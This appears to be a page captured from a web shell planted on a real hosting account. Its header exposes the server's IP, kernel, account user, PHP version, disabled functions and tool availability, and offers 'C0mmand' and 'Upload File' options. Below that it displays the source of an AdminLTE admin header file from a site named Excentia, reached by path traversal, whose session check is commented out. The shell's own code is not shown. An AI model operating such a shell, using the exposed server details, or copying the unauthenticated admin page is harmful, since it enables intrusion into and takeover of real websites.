|
Server IP : 145.79.210.100 / Your IP : 216.73.216.101 Web Server : LiteSpeed System : Linux in-mum-web1954.main-hosting.eu 5.14.0-570.26.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 16 09:12:04 EDT 2025 x86_64 User : u474798400 ( 474798400) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u474798400/domains/excentia.in/public_html/admin/upload_image/../include/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
//session_start();
//include('checksession.php');?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>AdminLTE 3 | Excentia</title>
<!-- Google Font: Source Sans Pro -->
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,400i,700&display=fallback">
<!-- Font Awesome -->
<link rel="stylesheet" href="plugins/fontawesome-free/css/all.min.css">
<!-- Ekko Lightbox -->
<link rel="stylesheet" href="plugins/ekko-lightbox/ekko-lightbox.css">
<!-- Theme style -->
<link rel="stylesheet" href="dist/css/adminlte.min.css">
<link rel="stylesheet" href="plugins/summernote/summernote-bs4.min.css">
<link rel="stylesheet" href="plugins/fontawesome-free/css/all.min.css">
<link rel="stylesheet" href="last/summernote-bs4.min.css">
<style>
.sec22{width: 30%; float: left; margin: 50px 0 0 20%;}
.sec23{width: 40%; float: left; margin: 50px 0 0 3%;}
.secin{width: 100%; float: left;}
.note-editor.note-frame .note-editing-area .note-editable{min-height: 150px;}
.add_images{
font-size: 31px;
font-weight: bold;
cursor: pointer; float:right;
}
.remove_images{
margin-left: 8px;
font-size: 31px;
cursor: pointer;
font-weight: bold;
}
.addpro{ float:right; color:#fff;}
.lefts{width:50%; float:left; clear:both;}
.rights{width:50%; float:right; clear:both;}
.remove_images{padding: 18px 14px; background:#F00; moz-border-radius:50%; webkit-border-radius:50%;border-radius:50%;line-height: 0;
color: #fff;}
.add_images{padding: 19px 11px; background:#1edf02; moz-border-radius:50%; webkit-border-radius:50%;border-radius:50%;line-height: 0;
color: #fff;margin: 0 0 0 10px;}
.preview-area{
display: flex;
flex-wrap: wrap;margin: 200px 0 0 0; width:100%;
}
.preview-area img{
width: 100px;
margin: 0 0 10px;
object-fit: contain;
}
.preview-area img:not(:nth-child(4n)){
margin-right: 1.333%;
}
#dvPreview img{ margin:0.971%}
#dvPreview{width: 100%;
float: left;}
</style>
</head>
<body class="hold-transition sidebar-mini">
<div class="wrapper">
<nav class="main-header navbar navbar-expand navbar-white navbar-light">
<!-- Left navbar links -->
<!-- Right navbar links -->
<ul class="navbar-nav ml-auto">
<!-- Navbar Search -->
<li><a href="logout.php" class="btn btn-block btn-danger">Logout</a></li>
</ul>
</nav>
<!-- /.navbar -->
<!-- Main Sidebar Container -->
<aside class="main-sidebar sidebar-dark-primary elevation-4">
<!-- Brand Logo -->
<a href="dashboard.php" class="brand-link">
<!--<img src="last/logo.jpg" alt="salient Logo" class="brand-image img-circle elevation-3" style="opacity: .8">-->
<span class="brand-text font-weight-light">Excentia</span>
</a>
<?php include 'sitebar.php';?>
</aside>